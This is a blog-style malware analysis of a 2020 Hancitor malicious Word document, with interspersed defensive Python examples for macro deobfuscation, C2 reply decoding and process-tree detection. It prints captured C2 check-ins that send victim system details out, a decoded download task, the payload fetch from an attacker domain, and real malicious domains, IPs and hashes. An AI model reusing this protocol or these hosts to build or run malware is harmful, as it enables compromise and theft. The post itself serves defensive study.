2020-12-08 Hancitor Malspam

Summary
========
This quick post stems from a tweet from @James_inthe_box about some Hancitor malware that he was seeing. After several failed attempts in the past at getting a maldoc to download, I was able to today. Out of the several links that I had, only one worked. For a list of the other links that I saw, please see this Pastebin. The others did what they have always done in the past: redirected me to a DocuSign site. For the artifacts and such, please see my Github repo for this here.

Analysis
========
Once the maldoc was obtained, I figured that I would take a look at it using Didier’s strings.py script to see if anything stood out (using the -L option to sort the strings from smallest to largest). What I noticed right off the bat were some strings such as the following:

OpenMutexA
LoadImageA
USER32.dll
Local\Temp
& "\ya.0wav"
ShellExecute
Get-Credential. 
Process.Start" 
Windows PowerShell 4
ll,DllUnregisterServer
C:\Users\win7home\AppData\Local\Temp\ya.wav
C:\Users\win7home\Desktop\Builder_v5\ya.wav
c:\DuckVowel\tootree\BlowSpot\complete.pdb

Not seeing much of anything else, I jumped over to olevba to see what I could glean from that using the --decode and --deobf flags. Here is the end part from that run (it was able to decode the macro as well):

+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |Document_Open       |Runs when the Word or Publisher document is  |
|          |                    |opened                                       |
|Suspicious|Shell               |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|ShellExecute        |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|Shell32             |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|Call                |May call a DLL using Excel 4 Macros (XLM/XLF)|
|Suspicious|CreateObject        |May create an OLE object                     |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|Suspicious|VBA obfuscated      |VBA string expressions were detected, may be |
|          |Strings             |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|IOC       |W0rd.dll            |Executable file name                         |
|Hex String|'\x00\x02\t\x06'    |00020906                                     |
|Hex String|'\x00\x00\x00\x00\x0|000000000046                                 |
|          |0F'                 |                                             |
|Base64    |'2nt'               |Module10                                     |
|String    |                    |                                             |
|Base64    |'2nv'               |Module12                                     |
|String    |                    |                                             |
|Base64    |'2nu'               |Module11                                     |
|String    |                    |                                             |
|Base64    |'I'                 |Scri                                         |
|String    |                    |                                             |
|VBA string|\W0rd.d             |"\W" & "0rd.d"                               |
|VBA string|Local\Temp          |"Loc" & "al\Te" & "mp"                       |
|VBA string|pting.FileSystemObje|"pting.FileSystem" & "Object"                |
|          |ct                  |                                             |
+----------+--------------------+---------------------------------------------+

From glancing through the macro, it downloads a file and saves it as “ya.wav” in the user's “Local\Temp” directory. Looking through the deobfuscated macro, I also see a call to “DllUnregisterServer”, which is most likely where the “W0rd.dll” file comes into play. Since I did not see much else in the code, I went ahead and ran it on my VM.
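The olevba table above lists the string expressions it resolved ("\W" & "0rd.d", "Loc" & "al\Te" & "mp", and so on). The script below is an added example, not part of the original post or of olevba, showing what that resolution step does: it evaluates runs of VBA string literals and Chr()/ChrW() calls joined with & into a single literal and then pulls out the resulting strings. The sample macro lines are constructed to mirror the expressions olevba reported; they are not the maldoc's actual source.

```python
import re

# Constructed sample VBA, modelled on the string expressions olevba reported
# for this maldoc (not the real macro source). Raw string so backslashes survive.
SAMPLE_VBA = r'''
Set fso = CreateObject("Scri" & "pting.FileSystem" & "Object")
tmp = Environ("USERPROFILE") & "\AppData\" & "Loc" & "al\Te" & "mp" & Chr(92) & "ya." & "wav"
dll = Environ("APPDATA") & "\Microsoft\Templates" & "\W" & "0rd.d" & Chr(108) & Chr(108)
Shell "rundll32.exe " & dll & ",DllUnregisterServer", vbHide
'''

# One piece of a concatenation: a quoted literal or a Chr()/ChrW() call.
PART = r'(?:"[^"]*"|ChrW?\(\d+\))'
PART_RE = re.compile(PART)
# Two or more pieces joined with '&' (variables such as dll break the run, as they should).
RUN_RE = re.compile(PART + r'(?:\s*&\s*' + PART + r')+')


def _eval_part(tok):
    """Turn one literal or Chr(n) token into the text it evaluates to."""
    if tok.startswith('"'):
        return tok[1:-1]
    return chr(int(re.search(r'\d+', tok).group()))


def deobfuscate_vba(src):
    """Collapse every '&'-joined run of literals/Chr() calls into one literal."""
    def join(m):
        text = ''.join(_eval_part(p) for p in PART_RE.findall(m.group()))
        # VBA escapes an embedded quote by doubling it (relevant when Chr(34) is used)
        return '"' + text.replace('"', '""') + '"'
    return RUN_RE.sub(join, src)


def extract_strings(src, min_len=4):
    """Return the string literals left after deobfuscation, like a post-deobf strings run."""
    return [s for s in re.findall(r'"([^"]*)"', deobfuscate_vba(src)) if len(s) >= min_len]


if __name__ == "__main__":
    print(deobfuscate_vba(SAMPLE_VBA))
    for s in extract_strings(SAMPLE_VBA):
        print("  ", s)
```

On the constructed sample this yields Scripting.FileSystemObject, \AppData\Local\Temp\ya.wav and \Microsoft\Templates\W0rd.dll, the same artifacts the table hints at. Runs broken by a variable (the dll variable in the Shell line) are left alone, which is why a dynamic run on a VM is still needed to see the final rundll32 command line.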

From here I could see that I was pretty close on what the macro was doing. Once the maldoc was run there was a call out to “api.ipify.org” to get my IP address, and then a POST to “maduabin[.]com/8/forum[.]php” with details of my system, followed by the response that came back:

POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: maduabin.com
Content-Length: 113
Cache-Control: no-cache

GUID=12447747362005647368&BUILD=0712_843923&INFO=BILL-PC @ Bill-PC\Bill&EXT=&IP=212.102.37.91&TYPE=1&WIN=6.1(x64)

HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Tue, 08 Dec 2020 17:36:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45

NBYMARhAEg4OCkBVVR0bHh8cFQgPCQkfFBsOH1QZFRdVDxMNDxMSTklUHwIfBw==
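Hancitor check-in replies are base64-encoded and then XORed with the single byte 0x7A. The script below is an added example (not the author's code) that parses the check-in body from the capture above and decodes the reply: the result contains a {command:url} block whose URL is exactly the uiwuih43.exe download seen in the next request, which ties the two requests together. The body and reply strings are copied from the capture; the field set used for the detection heuristic is taken from that same body.

```python
import base64
import re
from urllib.parse import parse_qs

XOR_KEY = 0x7A  # single-byte key Hancitor applies on top of base64 for C2 replies

# Copied from the POST/response captured above.
CHECKIN_BODY = ("GUID=12447747362005647368&BUILD=0712_843923"
                "&INFO=BILL-PC @ Bill-PC\\Bill&EXT=&IP=212.102.37.91&TYPE=1&WIN=6.1(x64)")
C2_REPLY = "NBYMARhAEg4OCkBVVR0bHh8cFQgPCQkfFBsOH1QZFRdVDxMNDxMSTklUHwIfBw=="

# Field set of the check-in above; used as the detection signature.
CHECKIN_FIELDS = {"GUID", "BUILD", "INFO", "EXT", "IP", "TYPE", "WIN"}
# Decoded replies carry one or more {cmd:url} tasks; the bytes before them are ignored here.
TASK_RE = re.compile(r"\{([a-z]):(https?://[^}]+)\}")


def parse_checkin(body):
    """Split the form-encoded check-in into a dict (blank EXT= is kept)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def is_hancitor_checkin(path, body):
    """Heuristic: POST to /forum.php carrying the full Hancitor field set."""
    return path.endswith("/forum.php") and CHECKIN_FIELDS <= set(parse_checkin(body))


def decode_reply(b64_text):
    """base64-decode, then XOR every byte with 0x7A."""
    raw = base64.b64decode(b64_text)
    return bytes(b ^ XOR_KEY for b in raw).decode("latin-1")


def extract_tasks(decoded):
    """Return [(command_letter, url), ...] from a decoded reply."""
    return TASK_RE.findall(decoded)


if __name__ == "__main__":
    print(is_hancitor_checkin("/8/forum.php", CHECKIN_BODY))
    decoded = decode_reply(C2_REPLY)
    print(decoded)
    for cmd, url in extract_tasks(decoded):
        print(f"task {cmd}: {url}")
```

Decoding the captured reply gives Nlv{b:http://gadeforussenate.com/uiwuih43.exe}: the task URL is the binary fetched in the GET below, so the "assumption" that uiwuih43.exe becomes W0rd.dll follows directly from the C2 traffic. The three leading bytes before the braces are not explained by anything on this page and are simply skipped by the regex.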

I then saw that there was a GET request for a binary called “uiwuih43.exe” which is what I am assuming is the “w0rd.dll”:

GET /uiwuih43.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: gadeforussenate.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Dec 2020 17:36:40 GMT
Content-Type: application/octet-stream
Content-Length: 431995
Connection: keep-alive
Last-Modified: Tue, 08 Dec 2020 17:47:57 GMT
ETag: "5fcfbc4d-6977b"
Accept-Ranges: bytes

MZ......................@.............................................	.!..L.!This program cannot be run in DOS mode.

$.......PE..L......_.V..0.....'......P...&...............`....@...........................................

Once this is downloaded to the “C:\Users\%username%\AppData\Local\Temp\” directory and named “ya.wav,” it was then renamed and moved to “C:\Users\%username%\AppData\Roaming\Microsoft\Templates\W0rd.dll”. From there it was registered via rundll32.exe as seen below:

From here, rundll32.exe (PID 1588) proceeded to spawn a child process of itself (PID 1776). Both of these PIDs proceeded to talk outbound to the domain “maduabin[.]com” in the form of POSTs, which were similar to the POST seen above.

Using some of the filters for ProcMon which I got from here, I noticed the following:

- rundll32.exe (PID 1776) created a svchost.exe (PID 2224) which started reading various application paths and system paths on the filesystem
 - Also looked for anything bitcoin/bitcoin wallets related
- svchost.exe (PID 2224) performed a lookup using "api.ipify.org" and created a file called "kaosdma.txt" with the public IP address of my VM (artifact was left in C:\Users\%username%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KCT28PHI\ path)
- rundll32.exe (PID 1776) looked at various registry keys dealing with internet access

At the time of this writing, I did not see any signs of persistence set up on the VM. I also noticed in the PCAP that the VM was communicating with a few different IP addresses using TCP ports 1034-1043. UDP usage did not show any oddities.
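The process behaviour described above (rundll32 loading a DLL from a user profile path with the DllUnregisterServer export, rundll32 spawning a copy of itself, and that copy launching svchost.exe) is unusual enough to detect from process-creation telemetry alone. The following is an added example, not the author's tooling, of that logic run over a constructed set of Sysmon/EDR-style events. The PIDs 1588, 1776 and 2224 match the write-up; the parent of the first rundll32 (WINWORD.EXE) and the user name in the path are assumptions for the sample.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed events modelled on the ProcMon observations above. PIDs 1588/1776/2224
# follow the write-up; the WINWORD.EXE parent and the "Bill" profile path are assumed.
EVENTS = [
    ProcEvent(900, 1, r"C:\Windows\System32\services.exe", "services.exe"),
    ProcEvent(1000, 900, r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    ProcEvent(1200, 1, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
              '"WINWORD.EXE" /n 1208_37832604.doc'),
    ProcEvent(1588, 1200, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Users\Bill\AppData\Roaming\Microsoft\Templates\W0rd.dll,DllUnregisterServer"),
    ProcEvent(1776, 1588, r"C:\Windows\System32\rundll32.exe", "rundll32.exe"),
    ProcEvent(2224, 1776, r"C:\Windows\System32\svchost.exe", "svchost.exe"),
]

# A DLL under a user's AppData tree is writable by the user, not a system location.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.IGNORECASE)
# rundll32 <path>.dll,<export>  (export name is what the macro strings hinted at)
DLL_EXPORT = re.compile(r'rundll32(?:\.exe)?\s+"?([^\s",]+\.dll)"?,\s*(\w+)', re.IGNORECASE)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def find_suspicious(events):
    """Return one finding string per suspicious event, keyed by 'pid N:'."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        name = _basename(e.image)
        pname = _basename(parent.image) if parent else None
        if name == "rundll32.exe":
            m = DLL_EXPORT.search(e.cmdline)
            if m and USER_WRITABLE.search(m.group(1)):
                findings.append(f"pid {e.pid}: rundll32 loading {m.group(1)} "
                                f"export {m.group(2)} from a user-writable path")
            if pname == "rundll32.exe":
                findings.append(f"pid {e.pid}: rundll32 spawned by rundll32 (pid {e.ppid})")
        # Legitimate svchost.exe instances are children of services.exe; a Sigma-style
        # rule would add a short allowlist (e.g. MsMpEng.exe), omitted here for clarity.
        if name == "svchost.exe" and pname != "services.exe":
            findings.append(f"pid {e.pid}: svchost.exe parented by {pname or 'unknown'} "
                            f"(pid {e.ppid}), expected services.exe")
    return findings


if __name__ == "__main__":
    for line in find_suspicious(EVENTS):
        print(line)
```

Each of the three checks fires on exactly one of the constructed events (1588, 1776, 2224) and stays quiet on the normal services.exe/svchost.exe pair, which is the behaviour a production rule should be validated against before deployment.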

Artifacts
==========

IOCs
----
185.68.93.10 / maduabin.com (TCP/80)
185.18.52.47 (TCP/80)
8.208.96.63 / gadeforussenate.com (TCP/80)
93.184.220.29 / (TCP/80)
23.21.252.4 / (TCP/80)
54.225.220.115 / (TCP/80)
8.248.113.254 / (TCP/80)

Note that the first three entries are the C2 and payload hosts; the remaining addresses were simply seen in the PCAP, and the passive DNS results below tie 23.21.252.4 and 54.225.220.115 to api.ipify.org (AWS) and 93.184.220.29 to Symantec/DigiCert certificate infrastructure, so treat those as low-fidelity indicators rather than blocklist candidates.

File hashes
-----------
2fbff281b9d4d240ef5a800c08cf26d4d4944e73227860a7c4afeb3b11615238 – 1208_37832604.doc
ec1fda96044f67abf36e7d3ddbf9fdb06b9fba9c7d29761487221568746dd05b – W0rd.dll

Machinae results
----------------
********************************************************************************
* Information for 185.68.93.10
* Observable type: ipv4 (Auto-detected: True)
********************************************************************************
[-] No IPVoid Results
[-] No Malc0de Results
[+] AbuseIPDB Results
[-] AbuseIPDB reports: 1
[-] No RansomwareTracker Results
[-] No SANS Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Not Rated
[+] VirusTotal pDNS Results
[-] pDNS data from VirusTotal: (‘2020-12-03’, ‘bandieve[.]com’)
[-] pDNS data from VirusTotal: (‘2020-12-02’, ‘eaussill[.]com’)
[-] pDNS data from VirusTotal: (‘2020-12-08’, ‘maduabin[.]com’)
[-] pDNS data from VirusTotal: (‘2020-12-09’, ‘spardethe[.]com’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-09’, ‘hXXp://spardethe[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-09’, ‘hXXps://maduabin[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-09’, ‘hXXp://maduabin[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-08’, ‘hXXp://maduabin[.]com/8/forum[.]php/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-08’, ‘hXXp://eaussill[.]com/8/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-08’, ‘hXXp://maduabin[.]com/8/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-07’, ‘hXXp://bandieve[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-06’, ‘hXXp://eaussill[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-04’, ‘hXXp://bandieve[.]com/8/forum[.]php/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-04’, ‘hXXp://bandieve[.]com/8/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-04’, ‘hXXps://bandieve[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-03’, ‘hXXps://eaussill[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-03’, ‘hXXp://eaussill[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-03’, ‘hXXp://eaussill[.]com/8/forum[.]php/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-02’, ‘hXXp://eaussill[.]com/8/’)
[-] No ThreatCrowd IP Report Results

********************************************************************************
* Information for maduabin.com
* Observable type: fqdn (Auto-detected: True)
********************************************************************************
[-] No URLVoid Results
[-] No URL Unshorten Results
[-] No Malc0de Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Malicious Websites
[+] VirusTotal pDNS Results
[-] pDNS data from VirusTotal: (‘2020-12-08’, ‘185[.]68.93.10’)
[-] No McAfee Threat Results

********************************************************************************
* Information for 185.18.52.47
* Observable type: ipv4 (Auto-detected: True)
********************************************************************************
[-] No IPVoid Results
[-] No Malc0de Results
[+] AbuseIPDB Results
[-] AbuseIPDB reports: 1
[-] No RansomwareTracker Results
[-] No SANS Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Malicious Websites
[+] VirusTotal pDNS Results
[-] pDNS data from VirusTotal: (‘2020-12-01’, ‘kvmnl01-22132[.]fornex[.]org’)
[-] pDNS data from VirusTotal: (‘2020-11-26’, ‘otsoebabe[.]com’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-08’, ‘hXXps://otsoebabe[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-08’, ‘hXXp://otsoebabe[.]com/8/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-07’, ‘hXXp://cussoricti[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-01’, ‘hXXp://otsoebabe[.]com/8/forum[.]php/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-01’, ‘hXXp://otsoebabe[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-11-20’, ‘hXXp://185[.]18.52.47/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-11-11’, ‘hXXps://cussoricti[.]com/’)
[-] No ThreatCrowd IP Report Results

********************************************************************************
* Information for 8.208.96.63
* Observable type: ipv4 (Auto-detected: True)
********************************************************************************
[-] No IPVoid Results
[-] No Malc0de Results
[-] No AbuseIPDB Results
[-] No RansomwareTracker Results
[-] No SANS Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Not Rated
[+] VirusTotal pDNS Results
[-] pDNS data from VirusTotal: (‘2020-12-09’, ‘gade4senate[.]com’)
[-] pDNS data from VirusTotal: (‘2020-12-09’, ‘gadebrigade[.]com’)
[-] pDNS data from VirusTotal: (‘2020-12-08’, ‘gadeforsenate[.]com’)
[-] pDNS data from VirusTotal: (‘2020-12-09’, ‘gadeforsenator[.]com’)
[-] pDNS data from VirusTotal: (‘2020-12-08’, ‘gadeforussenate[.]com’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-09’, ‘hXXp://gadeforussenate[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-09’, ‘hXXp://gadeforussenate[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-09’, ‘hXXp://gadeforussenate[.]com/163.exe/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-08’, ‘hXXp://gadeforussenate[.]com/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-08’, ‘hXXps://gadeforussenate[.]com/’)
[-] No ThreatCrowd IP Report Results

********************************************************************************
* Information for gadeforussenate.com
* Observable type: fqdn (Auto-detected: True)
********************************************************************************
[-] No URLVoid Results
[-] No URL Unshorten Results
[-] No Malc0de Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Business
[-] No McAfee Threat Results

********************************************************************************
* Information for 93.184.220.29
* Observable type: ipv4 (Auto-detected: True)
********************************************************************************
[-] No IPVoid Results
[-] No Malc0de Results
[+] AbuseIPDB Results
[-] AbuseIPDB reports: 110
[-] No RansomwareTracker Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Information and Computer Security
[+] VirusTotal pDNS Results
[-] pDNS data from VirusTotal: (‘2020-11-23’, ‘sg[.]symcb[.]com’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-07’, ‘hXXp://93[.]184.220.29/’)
[-] No McAfee Threat Results
[+] ThreatCrowd IP Report Results
[-] Passive DNS: (‘cdn[.]digicert[.]com’, ‘2020-11-10’)
[-] Passive DNS: (‘ocsp.digicert.com.69.1.6c6969c6[.]roksit[.]net’, ‘2020-11-28’)
[-] Passive DNS: (‘93[.]184.220.29’, ‘2020-12-02’)
[-] Passive DNS: (‘bvsebn4jzwc57mggqcjqs3nrju.1.0.jglcsapd2lcyqqbypj4luwor5y.3w4t3ha[.]dns0[.]org’, ‘2020-12-09’)
[-] Known Malware Hash: 008d61c7e71f71815810ccacf54f4fc2
[-] Known Malware Hash: 02767e8cc7c3a80bb2e2b1cb1ccdcf5b
[-] Known Malware Hash: 03e65fbca95c55b2cb40ba0fa8aa16b4
[-] Known Malware Hash: 0dc99c742a9346aa8474528b64a3bbd4
[-] Known Malware Hash: 12219fa7c6864ef90d8a700dc2660450
[-] Known Malware Hash: 1408cea92978508640d1dee4e22b5384
[-] Known Malware Hash: 155ca23cd8f32e6b949de4863e08726c
[-] Known Malware Hash: 16f16b191c01042dab2cca8406ac37a8
[-] Known Malware Hash: 1a11f106ceb01bd7fa55612b45170c6a
[-] Known Malware Hash: 1c47579a3f9d728377e956a4207cef27
[-] Known Malware Hash: 2104c98cf906bb7d3a88b7e471e8e316
[-] Known Malware Hash: 22172af4761a14a9c9fd3fb25c7e9181
[-] Known Malware Hash: 222dc070ac4d8fdbb2c4645750a72e86
[-] Known Malware Hash: 287f6de92849fba5203f94b419d52ea4
[-] Known Malware Hash: 28f2b86fcb7b7cecd36923dfcfeb2456
[-] Known Malware Hash: 297479a976ea14118b83afbad3bb3f44
[-] Known Malware Hash: 2e3856e60726d447c224fec9d6b3efe2
[-] Known Malware Hash: 32753b03512d3ae84e2b3d71560ad1bd
[-] Known Malware Hash: 34401354c1818242012f6180ece7f051
[-] Known Malware Hash: 34f424a1c9d08bf131689d2e5e80e710
[-] Known Malware Hash: 364e3660e4399c213eaf2c83506ca795
[-] Known Malware Hash: 39b905e9a7939e6ebdda9a85af651b6d
[-] Known Malware Hash: 3d7f076e745efa6c2bbd637b4bdcdf4b
[-] Known Malware Hash: 400cd3412b77e8e8957b55120f05b064
[-] Known Malware Hash: 407816c12d7b15024f8535e1886de4e3
[-] Known Malware Hash: 43a863cec165857b55138a3bb7ba80af
[-] Known Malware Hash: 453079c819bcca32275ca2fc5d5d409b
[-] Known Malware Hash: 4577b4f37e8e017a877ccb6a39240b80
[-] Known Malware Hash: 47c35a5770035289fe8d8fea77bce2b8
[-] Known Malware Hash: 48a058e3f4fd7adef124ef7c2147bd26
[-] Known Malware Hash: 4ab037cbd928234b267e01a25c91f76c
[-] Known Malware Hash: 4b73d2c8f843090d98035437a9f73e6a
[-] Known Malware Hash: 4cccf7e01d0e58b25b88359826acf9af
[-] Known Malware Hash: 4e8177209842471212715c5f7f2d8801
[-] Known Malware Hash: 51a3c0cbf6cd201396dcf2f5f3612af7
[-] Known Malware Hash: 545432a74263cef73fe99f5888747b8e
[-] Known Malware Hash: 5985d8286f913fd3eeb5101318c69718
[-] Known Malware Hash: 59a6501d0c16bd6c8e56a09dda0cb4bd
[-] Known Malware Hash: 5acc539355258122f8cdc7f5c13368e1
[-] Known Malware Hash: 5e46640828bdf9fbad37b5178dcd1dd9
[-] Known Malware Hash: 644536250fedb45b2cae354cda11aeef
[-] Known Malware Hash: 672b221378f53c9b2a45f6ff100be357
[-] Known Malware Hash: 6745fa5768222f5bde3a1fa6c774b28e
[-] Known Malware Hash: 69e6900cd860737eeba9b2b3bf0d71b4
[-] Known Malware Hash: 6f26014edcf48dc0f4588a08b3a78fa3
[-] Known Malware Hash: 7195376e8087cc1f388bcede563077e3
[-] Known Malware Hash: 768646c048513a0906b7f5df3bc5ed3c
[-] Known Malware Hash: 7a6f420348d5a06a6a22482a59f4fe9d
[-] Known Malware Hash: 7b7bc095ab57ea9e1b95f69ec3339ba5
[-] Known Malware Hash: 7e6185bac1c37b59074f35e2b7108093
[-] Known Malware Hash: 826b425d88600d44127bb1c887b8e706
[-] Known Malware Hash: 834eac4e8dcb1e25d97c86cd1c673f5b
[-] Known Malware Hash: 85c004bf3ab8cf01662cb288ea9ae5db
[-] Known Malware Hash: 8adb8c91d0d5ec2f107b21997978e7b6
[-] Known Malware Hash: 8bfa9f96c3da4b8a4a5bafa99fba258c
[-] Known Malware Hash: 92fe5ff45c1b0b952cf95894d3e5f039
[-] Known Malware Hash: 9366f36464a6f66daf3dd18aad620d4b
[-] Known Malware Hash: 96aadac7d3a0616bcaf9b5d1001ace57
[-] Known Malware Hash: 98c1ad5734e5889302edb695241c70ad
[-] Known Malware Hash: 99017441b34a09bc449e8a7307243f4b
[-] Known Malware Hash: 9e7e95d726b0d3e5cfb69ab90eddfe4e
[-] Known Malware Hash: a39f7f890e4aa66827afb5511ec8623b
[-] Known Malware Hash: a85ff92b8bf166872885b29e77807115
[-] Known Malware Hash: a9e4734d2f50e9a884f43c0cb1e46f46
[-] Known Malware Hash: ad9df601fbcc60413af1c0637717add4
[-] Known Malware Hash: b1e2ae56447ee9ee9bc3178490e0155b
[-] Known Malware Hash: b8b35f26235ae10b4f97195a3c04bfde
[-] Known Malware Hash: b8bbef3f4d7ba13c5bde0849731718dd
[-] Known Malware Hash: c0d3eacc48a41057de0838c09b97a3a7
[-] Known Malware Hash: c2d8ee8e7603da95fafeaf018bac99f9
[-] Known Malware Hash: c345cc11822bc3005ad6144b0fc15fce
[-] Known Malware Hash: c415a66ab37a072c0279c9f902b85fc2
[-] Known Malware Hash: c65f767a0e2209f1177dbf0955e74eb6
[-] Known Malware Hash: c7a6d45c9fb24e74760c0e85f927532a
[-] Known Malware Hash: d020316652cbfa9eeb97d093e9df9c1f
[-] Known Malware Hash: d8062f01439148efce2b87248ea0f1f7
[-] Known Malware Hash: de70d10aa65617ab056c90375786afbf
[-] Known Malware Hash: e45823ae0d754fc0206f14c1fc43eb74
[-] Known Malware Hash: e4d7099f1c188da54fd1e569f758b4b4
[-] Known Malware Hash: e65ee09c4d5b8ff3ed92279ebf145a90
[-] Known Malware Hash: ea94e325debb0d86d377678130ee8ce6
[-] Known Malware Hash: eb6b7520d0fc4517f523e8305b9ce76d
[-] Known Malware Hash: f1379d73f381f5f5ea486043e26c20ef
[-] Known Malware Hash: feebada441e07bc21ddde1ac9b1eed7e
[-] Known Malware Hash: ffda27dc13dd98337e531cecdba37d7d

********************************************************************************
* Information for 23.21.252.4
* Observable type: ipv4 (Auto-detected: True)
********************************************************************************
[-] No IPVoid Results
[-] No Malc0de Results
[-] No AbuseIPDB Results
[-] No RansomwareTracker Results
[-] No SANS Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Not Rated
[+] VirusTotal pDNS Results
[-] pDNS malicious URLs from VirusTotal: (‘2020-11-26’, ‘hXXp://23[.]21.252.4/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-11-16’, ‘(hXXp)://api[.]ipify[.]org/’)
[-] No McAfee Threat Results
[+] ThreatCrowd IP Report Results
[-] Passive DNS: (‘ec2-23-21-252-4.compute-1[.]amazonaws[.]com’, ‘2020-12-09’)

********************************************************************************
* Information for 54.225.220.115
* Observable type: ipv4 (Auto-detected: True)
********************************************************************************
[-] No IPVoid Results
[-] No Malc0de Results
[-] No AbuseIPDB Results
[-] No RansomwareTracker Results
[-] No SANS Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Not Rated
[+] VirusTotal pDNS Results
[-] pDNS data from VirusTotal: (‘2020-11-28’, ‘api[.]ipify[.]org’)
[-] pDNS data from VirusTotal: (‘2020-11-27’, ‘elb097307-934924932.us-east-1.elb[.]amazonaws[.]com’)
[-] pDNS data from VirusTotal: (‘2020-11-28’, ‘nagano-19599[.]herokussl[.]com’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-03’, ‘(hXXp)://api[.]ipify[.]org/’)
[-] pDNS malicious URLs from VirusTotal: (‘2020-12-02’, ‘(hXXp)://api[.]ipify[.]org/’)
[-] No McAfee Threat Results
[+] ThreatCrowd IP Report Results
[-] Passive DNS: (‘daveluxurylimo[.]ridebitsapp[.]com’, ‘2020-11-22’)
[-] Passive DNS: (‘limo-shuttle-taxi-bkbest[.]ridebitsapp[.]com’, ‘2020-11-25’)
[-] Passive DNS: (‘ec2-54-225-220-115.compute-1[.]amazonaws[.]com’, ‘2020-12-09’)

********************************************************************************
* Information for 8.248.113.254
* Observable type: ipv4 (Auto-detected: True)
********************************************************************************
[-] No IPVoid Results
[-] No Malc0de Results
[+] AbuseIPDB Results
[-] AbuseIPDB reports: 2
[-] No RansomwareTracker Results
[-] No SANS Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Not Rated
[-] No VirusTotal pDNS Results
[-] No McAfee Threat Results
[-] No ThreatCrowd IP Report Results

********************************************************************************
* Information for 2fbff281b9d4d240ef5a800c08cf26d4d4944e73227860a7c4afeb3b11615238
* Observable type: hash.sha256 (Auto-detected: True)
********************************************************************************
[+] VirusTotal File Report Results
[-] Date submitted: 2020-12-09 07:53:20
[-] Detected engines: 25
[-] Total engines: 62
[-] Scans: (‘Elastic’, ‘malicious (high confidence)’)
[-] Scans: (‘Symantec’, ‘Trojan[.]Gen.2’)
[-] Scans: (‘Avast’, ‘VBS:Obfuscated-gen [Trj]’)
[-] Scans: (‘Kaspersky’, ‘HEUR:Trojan-Dropper.MSOffice[.]SDrop[.]gen’)
[-] Scans: (‘NANO-Antivirus’, ‘Trojan.Ole2[.]Vbs-heuristic[.]druvzi’)
[-] Scans: (‘ViRobot’, ‘DOC.Z[.]Agent.556032.A’)
[-] Scans: (‘F-Secure’, ‘Trojan[.]TR/Kryptik[.]xdzeq’)
[-] Scans: (‘DrWeb’, ‘Trojan[.]Chanitor.59’)
